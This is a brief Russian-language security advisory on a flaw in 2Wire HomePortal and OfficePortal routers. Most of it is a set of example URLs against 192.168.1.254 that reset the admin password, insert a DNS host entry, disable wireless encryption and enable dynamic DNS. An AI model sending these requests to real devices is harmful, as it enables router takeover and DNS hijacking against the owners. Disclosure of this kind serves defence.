Программа:
2Wire HomePortal Series
2Wire OfficePortal Series

Уязвимость позволяет удаленному пользователю выполнить XSS нападение на целевую систему. Уязвимость существует из-за недостаточной обработки входных данных при обработке HTTP запросов. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.

Примеры:

Установить пароль (NUEVOPASS):

http://192.168.1.254/xslt?PAGE=A05_POST&THISPAGE=A05& NEXTPAGE=A05_POST&ENABLE_PASS=on&PASSWORD= NUEVOPASS&PASSWORD_CONF=NUEVOPASS

Добавить имена в DNS (216.163.137.3 www.prueba.hkm):

http://192.168.1.254/xslt?PAGE=J38_SET&THISPAGE=J38& NEXTPAGE=J38_SET&NAME =www.prueba.hkm&ADDR=216.163.137.3

Откючить аутентификации при использовании беспроводной связи

http://192.168.1.254/xslt?PAGE=C05_POST&THISPAGE=C05& NEXTPAGE=C05_POST&NAME=encrypt_enabled &VALUE=0

Установить Dynamic DNS

http://192.168.1.254/xslt?PAGE=J05_POST& THISPAGE=J05&NEXTPAGE=J05_POST &IP_DYNAMIC=TRUE

Оставить мнение